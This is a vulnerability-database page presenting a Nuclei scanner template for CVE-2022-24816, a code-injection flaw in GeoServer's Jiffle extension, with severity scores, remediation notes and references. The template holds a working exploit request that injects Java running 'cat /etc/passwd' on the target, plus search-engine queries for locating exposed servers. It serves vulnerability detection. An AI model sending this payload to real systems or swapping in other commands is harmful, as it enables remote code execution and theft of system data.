Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2022-24816
HistoryDec 30, 2022 - 8:27 a.m.

GeoServer <1.2.2 - Remote Code Execution

2022-12-3008:27:33
ProjectDiscovery
github.com
94
cve
cve2022
geoserver
rce
geosolutionsgroup
codeexecution
java
remotescriptfindviewbyidinoprotocols

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.967 High

EPSS

Percentile

99.7%

JSON
Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.

id: CVE-2022-24816

info:
  name: GeoServer <1.2.2 - Remote Code Execution
  author: mukundbhuva
  severity: critical
  description: |
    Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath.
  reference:
    - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
    - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
    - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24816
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24816
    cwe-id: CWE-94
    epss-score: 0.86265
    epss-percentile: 0.98506
    cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: geosolutionsgroup
    product: jai-ext
    shodan-query: /geoserver/
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
  tags: cve,cve2022,geoserver,rce,geosolutionsgroup

http:
  - raw:
      - |
        POST /geoserver/wms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
          <wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
            <ows:Identifier>ras:Jiffle</ows:Identifier>
            <wps:DataInputs>
              <wps:Input>
                <ows:Identifier>coverage</ows:Identifier>
                <wps:Data>
                  <wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>
                </wps:Data>
              </wps:Input>
              <wps:Input>
                <ows:Identifier>script</ows:Identifier>
                <wps:Data>
                  <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
                </wps:Data>
              </wps:Input>
              <wps:Input>
                <ows:Identifier>outputType</ows:Identifier>
                <wps:Data>
                  <wps:LiteralData>DOUBLE</wps:LiteralData>
                </wps:Data>
              </wps:Input>
            </wps:DataInputs>
            <wps:ResponseForm>
              <wps:RawDataOutput mimeType="image/tiff">
                <ows:Identifier>result</ows:Identifier>
              </wps:RawDataOutput>
            </wps:ResponseForm>
          </wps:Execute>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "ExceptionInInitializerError"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022076ce5c262b52d57466f3af023a28399c27dd8a0a2af7b210a24268a853de1ca00220187c683fede76e3625142f084c4ea680c65454438ff7186f71bbab5027937147:922c64590222798bb761d5b6d8e72950

Related

cve 1
github 2
osv 3
cisa_kev 1
vulnrichment 1
nvd 1
prion 1
cvelist 1
cve
cve
CVE-2022-24816
2022-04-13 21:15:07
github
github
Improper Control of Generation of Code ('Code Injection') in jai-ext
2023-09-19 20:35:16
GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language
2023-06-12 15:30:29
osv
osv
CVE-2022-24816
2022-04-13 21:15:07
Improper Control of Generation of Code ('Code Injection') in jai-ext
2023-09-19 20:35:16
GeoServer RCE due to improper control of generation of code in jai-ext`Jiffle` map algebra language
2023-06-12 15:30:29
cisa_kev
cisa_kev
GeoSolutionsGroup JAI-EXT Code Injection Vulnerability
2024-06-26 00:00:00
vulnrichment
vulnrichment
CVE-2022-24816 Improper Control of Generation of Code in jai-ext
2022-04-13 20:45:17
nvd
nvd
CVE-2022-24816
2022-04-13 21:15:07
prion
prion
Remote code execution
2022-04-13 21:15:00
cvelist
cvelist
CVE-2022-24816 Improper Control of Generation of Code in jai-ext
2022-04-13 20:45:17

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.967 High

EPSS

Percentile

99.7%

JSON
Related for NUCLEI:CVE-2022-24816
cve1github2osv3cisa_kev1vulnrichment1nvd1prion1cvelist1